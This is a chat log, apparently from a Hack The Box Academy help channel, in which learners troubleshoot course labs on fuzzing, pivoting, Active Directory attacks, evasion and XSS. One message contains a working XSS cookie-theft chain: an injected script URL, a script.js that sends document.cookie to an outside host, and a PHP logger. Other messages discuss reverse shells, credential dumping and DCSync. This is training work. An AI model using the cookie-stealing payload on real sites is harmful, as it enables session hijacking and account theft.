candid lily
#

change options on the rdp i guess

#

i use this alias alias xfreerdp='nohup >& /dev/null xfreerdp /w:1600 /h:900 /timeout:100000 /cert-ignore /drive:home,"/tmp/Temporary" +auto-reconnect'

next bronze
#

no /dynamic-resolution?

daring birch
#

What's up with the web interface on htb?

#

It looks buggy af

dry halo
#

how do I stop the memory map view from moving?

#

it just sorts itself. making it impossible to select

onyx nest
#

hi guys sorry to disturb, i recently got hacked by a trojan virus on my computer that completely emptied my phantom wallet. I need some experienced guys to help me understand who did this to me. I really just want to expose them, to help any other victim that these guys will target. They operate on a website in which they made you download a trojan virus. I was able to disassemble with ghidra, and i need someone to help me decrypt those files. Thank you so much in advance, i really hope someone will help me.

candid lily
rustic sage
#

So my question is:
"Try to use what you learned in this section to fuzz the '/blog' directory and find all pages. One of them should contain a flag. What is the flag? "

My issue is, i've followed the steps but it doesn't output me what the found website is.
Firstly it displays ".phps" with a status code of "403".

I've ran the word directory list after with the /blog/FUZZ.phps to see a webpage but im not sure if i've done it correctly.

#
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://83.136.251.109:52734/blog/FUZZ.phps
rustic sage
rustic sage
#

And i assume that was to be invalid and I've done something wrong

next bronze
#

include the module and section name, we won't know which specific question otherwise

rustic sage
#

Alright

#

Module name is Attacking Web Applications with Ffuf

#

And the section is

#

page fuzzing

next bronze
#

/blog is a directory

rustic sage
#

yes I know

#

Oh wait I understand

obtuse bone
#

ffuf returns lots of false positives use a flag to filter out invalide response size

rustic sage
#

do i replace BLOG with Fuzz?

#

it gave me the extension of ".phps"

next bronze
#

so it won't be blog.php, it will be a file inside the directory, e.g. /blog/index.php

rustic sage
next bronze
#

a directory contains files, it won't have file extensions

rustic sage
#

it could be another webpage in the future for other things

rustic sage
#

-fs right

rustic sage
#

personally i found that a little odd to myself

obtuse bone
#

yes, i usually run it the first time to figure out the size of the content i want to screen out then run it again with the flag

next bronze
#

a response of 200 means the page exists

rustic sage
#

Actually look, my command states using the web-extension file to display what extensions exists but only phps outputted, there wasnt any i found to be fair

candid lily
#

is it possible to bypass this, pw_hash gives sha256

obtuse bone
#

try -e .php

next bronze
next bronze
#

first try the extensions, if there's one that returns 200, you can use that to continue to fuzz the page

rustic sage
#

nvm ignore that

candid lily
#

stuck for ever, i cant find a way to bypass it

rustic sage
candid lily
#

bypass login without a password

rustic sage
#

well,,,, I don't think you can unless you SQLI or able to run code backend usually tries to prevent it

candid lily
#

this is from type juggling section

rustic sage
#

Oh not sure myself then apologies

#

I havent went to that topic im not really a programmer, I can read code but cant write it

candid lily
#

its either that or this we have to exploit one

#

it says allow access to "all" our admin user, never mention anything about the convention of names

next bronze
#

you should include the module and section name and where you're stuck at so that people can help you, instead of just posting screenshots without any context

candid lily
#

i think i have to bypass the login somehow with username containing admin but i cant find which admin user has password that hash numeric hash

foggy glacier
#

In the Pennyworth module…. Very easy, getting started. I was curious as to why it is that nothing happens when I start the netcat listener and have everything matched up to execute /bin/bash/ in the Giddy reverse shell script code.. whoami yields nothing. I’ve tried several different ports. It acts like I’ve just done nothing at all. No confirmation of connection or anything.

steady plume
#

Hello! I am trying to solve 2nd part of challenge in Privilege Escalation. I can see I am working as user2 and I can see flag.txt is in root/flag.txt, but I don't have permissions. There are no commands I can run as user2 as root. However, I can see I have access to id_rsa under /root/.ssh/ on remote. I am hard time moving onwards from here.

rustic sage
#

have u tried changing into the directory>?

#

using "cd"

#

also linux fundamentals you need to use the mousepad command with the filepath to open it

#

wait ur tryuing to open the flag.txt right, oh wait this windows

#

try the notepad command in the windows console to try open it

steady plume
rustic sage
#

ye

steady plume
#

It is linux

rustic sage
#

oh it's linux?

#

hmm ok try to cd into it

steady plume
#

I cannot just cat or vim flag as I have no permission

rustic sage
#

sudo?

steady plume
#

I need to be sudo, but I am not sure how to get that privilege from user2 to sudo...

rustic sage
#

do u have access to

#

user1? maybe if thats admin u can change permissions for user2

next bronze
steady plume
steady plume
#

I can copy that id_rsa to my local

next bronze
steady plume
#

but it didn't work

next bronze
#

why did it not work

steady plume
stark lark
#

What can cause this? If I go to the webserver through webbrowser it works fine

candid lily
#

it says permission deined

#

change to a writable folder maybe

#

like /Users/Public/

stark lark
#

Don't know why it shouldn't be writeable, im in the users own dir

#

temp doesnt work either

next bronze
next bronze
candid lily
#

did you get the answer

stark lark
candid lily
#

how did you run it

#

./Lazagne.exe should run it in same terminal

steady plume
stark lark
next bronze
steady plume
#

got it

#

I forgot to chmod the file with key inside

steady plume
candid lily
#

it seems like so many people had stuck with this and there is no answer in discord history :( and forum

#

OH nvm found it wow

#

for future people: check every function and every value in loose comparision

manic smelt
#

Heyy

nova ruin
#

We need Splunk model 🥹

dim wolf
timber hatch
#

can somebody help me with the module INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Static Analysis?
i try to get the reverse shell as explained, the reverse shell works when i just use a normal .exe created with msfvenom, but when i use the C# code it doesnt work

#

no mod here who has done the module?

abstract agate
hushed sail
#

SQLi fundamentals gave me a headache 😵‍💫

glass quail
#

I liked it hehe

hushed sail
timber hatch
timber hatch
#

i dont...

#

can i send you the C# code in private for a quick review?

abstract agate
#

Sure

timber hatch
#

thanks

glass quail
hushed sail
glass quail
slate pagoda
manic smelt
#

All good how about youu

hushed sail
hushed sail
rustic sage
#

ffuf, page fuzzing. Only .phps exists?

#

and status code is 403 so it wouldn't really work

#

my input

split glade
# rustic sage

Shouldn't you check for other file names/folder names too? Here you're just checking for files called index with different extensions

buoyant void
#

I just realized there's an Assembly Language module, that's so awesome. HTB Academy really is a great resource

elder lily
#

I’m new to cybersecurity and I wanted to know were should I start on HTB? Academy labs or CtF

compact patrolBOT
vital hull
#

For some reason when i use HUD mode in ZAP and open my browser i try to put the domain in scope put the target doesn't change neither the text

glass quail
buoyant void
hushed sail
glass quail
buoyant void
nova idol
#

Stuck at broken authentication skill assessment any one can help🫤

#

I get username name and password

#

But i stuck at 2FA otp

buoyant void
# nova idol But i stuck at 2FA otp

I'm guessing you've tried bruteforcing OTP with no results right? So go back through your notes from the module and try other ways other than bruteforcing OTP. Register a new account and see what a normal login request looks like and go from there

rustic sage
quasi jungle
#

https://academy.hackthebox.com/module/103/section/1008
URL being used

http://10.129.113.130/hijacking/?fullname=test&username=testtest&password=test&email=test%40test.com&imgurl=%22%3E%3Cscript+src%3Dhttp%3A%2F%2F10.10.15.121%3A8080%2Fscript.js%3E%3C%2Fscript%3E

script.js

cat script.js
 
new Image().src='http://10.10.15.221/index.php?c='+document.cookie

index.php

cat index.php

<?php
if (isset($_GET['c'])) {
    $list = explode(";", $_GET['c']);
    foreach ($list as $key => $value) {
        $cookie = urldecode($value);
        $file = fopen("cookies.txt", "a+");
        fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
        fclose($file);
    }
}
?>

Php server command and logs

sudo php -S 0.0.0.0:8080
[Thu Jun 13 01:42:18 2024] PHP 7.4.33 Development Server (http://0.0.0.0:8080) started
[Thu Jun 13 01:43:37 2024] 103.56.61.130:55874 Accepted
[Thu Jun 13 01:43:37 2024] 103.56.61.130:55874 Invalid request (Malformed HTTP request)
[Thu Jun 13 01:43:37 2024] 103.56.61.130:55874 Closing
[Thu Jun 13 01:50:12 2024] 87.121.69.27:40472 Accepted
[Thu Jun 13 01:50:12 2024] 87.121.69.27:40472 [200]: CONNECT google.com:443
[Thu Jun 13 01:50:12 2024] 87.121.69.27:40472 Closing

Any idea what I am missing, don't seem to be receiving any relevant requests in php server logs even after I run the URL

fathom pendant
#

also i suggest, if you're using pwnbox, to specify your tun0 ip -- as the other Interface is public facing

#

hence why you're getting those rando public IPs connecting

rustic sage
cloud urchin
#

Can anyone help me with SPN jacking on DACL II? the impacket-getST command isn't working, it fails due to authentication errors. I feel like the hash is wrong. Am I just doing something wrong? This is the "Abusing Live SPN Jacking from LInux" section. Had no issues doing it in Windows.

inland mesa
#

Can someone nudge me on Attacking Domain Trusts - Child -> Parent Trusts - from Linux

I am trying to find the hash from this question
Perform the ExtraSids attack to compromise the parent domain from the Linux attack host. After compromising the parent domain obtain the NTLM hash for the Domain Admin user bross. Submit this hash as your answer.

I was able to get the reverse shell through psexec.py and have searched everywhere in the shell but I can't find anything that can help me get the hash. I did find bross "||" 1179: INLANEFREIGHT\bross (SidTypeUser)"||" but not sure where to go from there.

returning to HTB after a break so please bear with me haha

cloud urchin
#

Let me fire the module up and get it

next bronze
inland mesa
next bronze
#

I don't remember the IP, your target is the INLANEFREIGHT.LOCAL domain

cloud urchin
next bronze
#

yeah that means whatever credentials you gave it is wrong

cloud urchin
#

did you complete this section?

next bronze
#

yeah, you can dm but I don't have notes for that question

sick frost
#

can anyone help me with bloodhound. I don't get why but for some reason the zip file from the SharpHound is not getting uploaded to my bloodhound. Neo4j is running fine. It's always getting stuck in the same way as shown in the screenshot. I'm facing this problem from long time. I was only able to successfully upload the files 2-3 times in last 4 months. Can anyone help me with what I should do?

normal sand
#

The Footprinting module is the only module that covers external stuff in the Penetration Tester Path, yeah?

next bronze
#

use v2.0

next bronze
normal sand
#

@next bronze the other day I was on the pivoting module and you recommended learning ligolo-ng to me. Is there a resource you'd recommend or should I just reference their GitHub?

normal sand
next bronze
next bronze
normal sand
#

For some background on me, I've never done a full-blown pentest.

next bronze
#

many people who passed the exam have not either, you'll be fine

sick frost
next bronze
next bronze
sick frost
shut quest
normal sand
cloud urchin
#

documentation is the hardest part of the path imo

normal sand
next bronze
cloud urchin
#

pretty sure older versions of bh won't support certain permissions etc, so you may miss some attack vector(s) using old stuff

shut quest
normal sand
shut quest
normal sand
#

Thanks for clarifying.

normal sand
next bronze
#

couple of days for dante, about a week for zephyr

#

if I remember right, it's been a while

glass quail
#

hey guys do you know if you can filter based on response in zaproxy?

sick frost
split glade
#

For Active Directory Enumeration & Attacks -> Privileged Access
If you can't connect with SSH to 172.16.5.150 through the Windows host cf
#modules message
#modules message
It turns out that, on my end, the host with the SSH server (172.16.5.150/ACADEMY-EA-DB01) can't access my clipboard if I ssh with powershell through the RDP session (ACADEMY-EA-MS01).
So trying to copy paste the htb-student password doesn't work.
But manually typing its password does

inland mesa
next bronze
glass quail
#

Module: Broken Authentication
hey guy has anyone done the module broken authentication? I need some one to check if this command is good or not

fathom pendant
split glade
# fathom pendant try adding +cliboard to your xfreerdp command, also pasting the password into no...

I already have a working bidirectionnal clipboard with both Remmina and xfreerdp, so it should work, noneless I tried:

  • copy pasting into notepad (with both)
  • turning off clipboard sync through Remmina
  • +clipboard option for xfreerdp
    Nothing worked. It's not that big of a problem though, because it can be quickly solved with a port forwarding. But yes it's weird.
    PS: this command to "pipe" a string to the clipboard gives this result echo 'a'|xclip -selection c
cloud urchin
#

copy paste to keystrokes

#
Clipboard := Clipboard
SendInput %Clipboard%
return
``` this is an autohotkey script that should take your clipboard input and output keystrokes
#
``` there's also xdotool for linux
split glade
#

@cloud urchin Neat! Thanks

timber hatch
#

can somebody help me with the module INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Static Analysis?
i try to get the reverse shell as explained, the reverse shell works when i just use a normal .exe created with msfvenom, but when i use the C# code it doesnt work

eager ledge
#

Hi, I am still doing the Pivoting module. I have got the final flag on DC. However, I had to take help from youtube video for this. What I am trying to do is scan an open port on DC through 3 proxies. I have set up dynamic port forwarding so that I can chain proxies using proxychains. To make sure that the proxy configuration is correct, I need one of the open ports. So, if anyone knows it, please DM me

#

All I am getting right now is socket error or timeout! for some of the standard service ports of Windows.

#

The setup that has allowed me to get the final flag, must require the DC to open a certain port to provide that service, isn't that right?

stark lark
#

https://academy.hackthebox.com/module/147/section/1320 - Password attacks, Linux.

Is this a false positive or how? From my research I could understand that you have to make a mutated password list, but for who? Will or Kira? And how would I know if I didn't use the hint..

I have tried using Will's password for all services running, but without luck.

candid lily
#

does anyone know a way to send multiple requests to exploit race conditions

#

in the module they use burpsuite turbo intruder but that works only for a single request, i wanna send different request

split glade
normal sand
rustic sage
#

Module attacking web apps with ffuf
Question: Try to use what you learned in this section to fuzz the '/blog' directory and find all pages. One of them should contain a flag. What is the flag?

Problem: Tried fuzzing in "/blob/FUZZ", I do not get a webpage at all

#

bottom is my query

#

🤔 so many 200 statuses but no webpage to be discovered, it's weird

#

Am i supposed to get the file extension first? before i can fuzz a webpage?

eager ledge
rustic sage
stark lark
# split glade Maybe try what is in the section?

Yes I'd love to, but it requires initial access. Sometimes I don't understand how you would solve the challenge without the hint.

In this case; how would I know there is a Kira account and that it's assumed PW is xxxx?

rustic sage
#

there's like literally no available extensions

split glade
storm elk
#

...FUZZ.php?

rustic sage
#

sending result

#

OH MY GOD IK WHY

#

LMAO THE DIRECTORY ISNT RIGHT

stark lark
rustic sage
#

ezerino

storm elk
#

great job

eager ledge
lean cloak
#

~~Hello all! I have a question about Module 57 Section 491; specifically the second question to obtain the ftp flag. I was able to su to the other user ||m.gates||, but when I attempt to ftp, I get the ftp prompt but every command results in "Not connected", except exit which does indeed exit. What basic thing am I missing?

EDIT: the connection times out
ftp: connect: Connection timed out~~

NVM!

split glade
# rustic sage there's like literally no available extensions

And also you're not using the command correctly, like the command here #modules message
will request /blog/.asp, /blog/.aspx etc. That's not what you want right? You want to at least add some file names, and maybe even folders?
Like here:
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://www.target.domain/FOLDERS/WORDLISTEXTENSION

rustic sage
rustic sage
muted kindle
rustic sage
muted kindle
rustic sage
#

read why it becomes filtered

#

what question are you on?

muted kindle
rustic sage
#

oh is that not an nmap module?

muted kindle
#

I don’t have the module but when I did chisel and ssh dyn port forwarding in another course it unpredictably results in “filtered”

rustic sage
#

how are u scanning?

muted kindle
#

A generic command like proxychains nmap -sT -Pn -n <ip> and the disable arp flag ive forgot

#

Scanning through Ligolo is very reliable though

rustic sage
#

a bit aggressive but personally this is all i ever needed for nmaping

muted kindle
#

-sS wil break with proxychains

white gate
#

Hi all, please can someone help me, I'm busy with the XSS module, and I have been writing exactly the same script that is in the notes for the phishing section where I have to insert a login form but as you can see from the picture it's not taking the full command, and for some reason my client side looks nothing like the demonstration. Can someone please explain where I am going wrong

#

This is the payload that I'm using which is exactly the same as the code in the demonstration

rustic sage
eager ledge
muted kindle
eager ledge
white gate
spark spruce
eager ledge
rustic sage
next bronze
#

nmap works fine over proxies, you just need to set the right flags for it

next bronze
eager ledge
next bronze
#

I'm pretty sure double pivot will do for the module, unless the module has 3 different subnets which I don't remember it having

eager ledge
#

It will be spoiler for others the question that I want to ask

next bronze
#

I don't have notes on this, it's just based on memory and experience

#

but I'm telling you that there isn't a triple pivot, don't overthink it

rustic sage
#

speed is a major factor with nmap

next bronze
#

reduce the number of ports youre scanning if speed is a convern

normal sand
next bronze
#

I've never used socks over rdp outside of that module so I can't help you here

forest zenith
#

Hello! Has somebody here done the module INTRODUCTION TO DESERIALIZATION ATTACKS?

#

please dm me if you have

normal sand
rustic sage
#

u should scan for all ports anyways

next bronze
next bronze
normal sand
noble heath
#

[CDSA][1 of 2] Intrusion Detection With Splunk (Real-world Scenario):
https://academy.hackthebox.com/module/218/section/2357
Hi guys/admins. I did some black box threat hunting and found some interesting stuff on the dataset for the said module that were not asked in the module exercises, as well as other things that needs to be verified such as:
||1. After the credential dumping via comsvcs.dll's minidump function (2022-11-06 11:44:07) on host (DESKTOP-EGSS5IS), the adversary proceeds in executing psexec related commands '
to enumerate the other host (10.0.0.47, DESKTOP-UN7T4R8) commands such has hostname, whoami or any generic situational awareness commands as well as network enum ones (2022-11-06 11:57:27) though I saw one command on 10.0.0.47 related to commandline: net user waldo Password@123 (2022-11-06 11:12:32). What's not clear to me is the net user command, would it be right to assume that prior to the dumping at DESKTOP-EGSS5IS, waldo created the user created the user waldo with password Password@123 via the net user waldo Password@123 since this event took place first before the dumping of credentials?

  • comsvcs.dll's minidump function (2022-11-06 11:44:07) on host DESKTOP-EGSS5IS
  • net user waldo Password@123 (2022-11-06 11:12:32) on host DESKTOP-UN7T4R8
    [!] This comes to a fact as well that after the credential dumping event there's one successful login event from DESKTOP-EGSS5IS for the user waldo against DESKTOP-UN7T4R8 but
    that is at 2022-11-06 11:59:59 which is normal given that there's credential dumping that took place, but I still can't figure it out how net user waldo Password@123 was
    executed on DESKTOP-UN7T4R8 where in fact the dumping just took place after the net user related event?||
#

[CDSA][2 of 2] Intrusion Detection With Splunk (Real-world Scenario):
https://academy.hackthebox.com/module/218/section/2357
Hi guys/admins. I did some black box threat hunting and found some interesting stuff on the dataset for the said module that were not asked in the module exercises, as well as other things that needs to be verified such as:
||
2. As for other attacks I've seen notepad.exe and cmd.exe was set to be a persistence mechanism as initiated by randomfile.exe on host DESKTOP-EGSS5IS
cmd.exe and notepad.exe was used to escalate privilege from user waldo > NT AUTHORITY\SYSTEM upon its execution as a persistence mechanism on 2022-11-08
(Please confirm this finding)
3. I saw SharpHound.exe and file.exe being fetched by the adversary via PS' Invoke-WebRequest on DESKTOP-EGSS5IS. tools used agains the domain and its users as of now I don't see anything other than these 2 (Please confirm this finding)
4. Invoke-DCSync.ps1 was downloaded on DESKTOP-UN7T4R8. (Please confirm this finding)
5. Was able to see a DCsync attack related artifact via Windows Event ID 4662 user waldo being the culprit for that. Can you confirm if the DC controller is host WIN-HSRME76TRAD.uniwaldo.local? (Please confirm this finding)
6. Aside fromn SharpHound.exe being invoked on DESKTOP-EGSS5IS and Invoke-DCSync.ps1 invoked on DESKTOP-UN7T4R8 are there any other steps that I've missed or any major attacks against the DC? (Please confirm this finding)||

normal sand
#

I get that the SocksOverRDP is doing SOCKS tunneling over RDP, and then the proxifier is used on the pivot host to forward traffic? So where does the double pivot play into this in that section, @next bronze?

next bronze
acoustic owl
normal sand
next bronze
#

yes, it makes things a lot easier

normal sand
next bronze
#

it can also be done with ssh or chisel, I wouldn't really recommend using socks over rdp tbh

#

it's good to know but terrible to use

next bronze
normal sand
forest zenith
next bronze
ashen dagger
#

Hi, can anyone help me with "AD Enumeration & Attacks - Skills Assessment Part I" Question N°6 (||tpetty|| cleartext pass). I'm trying Mimikatz... I am stuck. HELP

forest zenith
next bronze
forest lichen
#

Hi everyone!

I am new here and I have a question about Web Requests and how to run POST module.

I believe I am following all the steps given to me. Though I do not receive the same response the course tells me I should receive.

Will someone help me to find the answer?

How do I confirm the password using the "curl -X POST -d 'username=admin&password=admin' http://<SERVER_IP>:<PORT>/"?
How to get the JSON data from the Storage?

acoustic owl
# forest zenith yes man

Skill Assessment II?
This question?
Achieve remote command execution and read the flag.txt file

forest zenith
forest lichen
forest zenith
#

I dont know what else to try

acoustic owl
#

You have to find out the exact version first

forest zenith
#

version of what?

#

codeigniter? php?

acoustic owl
#

CodeIgniter

forest zenith
#

I have it, and used it in ||phpggc|| to get the payload

#

do I need to use also some function from codeigniter to get the hmac?

acoustic owl
#

I have no idea what you mean by hmac, sorry.
You need the correct CodeIgniter code, nothing more

forest lichen
# spark spruce Which section

The part where i authenticate the cookie. Thats where Im having problems

I dont know if ive authenticated or not. Not a flashing sign telling me I did it that I am aware of.

forest lichen
rustic sage
#

with ffuf is there a way to output only the status codes of 200?

rustic sage
tender vine
#

Hi! I'm trying to list AD users using "enumdomusers" within rpcclient. Is there any way to redirect the output to a file? I tried the usual redirect > but it doesn't work. Can't seem to find anything on google either

timber hatch
#

can somebody help me with the module INTRODUCTION TO WINDOWS EVASION TECHNIQUES / Static Analysis?
i try to get the reverse shell as explained, the reverse shell works when i just use a normal .exe created with msfvenom, but when i use the C# code it doesnt work

split glade
timber hatch
#

asking for a while now

tender vine
round moat
#

Figure out the exact organization name from the IMAP/POP3 service and submit it as the answer.
am stuck here even after using "sudo nmap <ip> -sC -p110,143,993,995 -sV
am still not getting any answer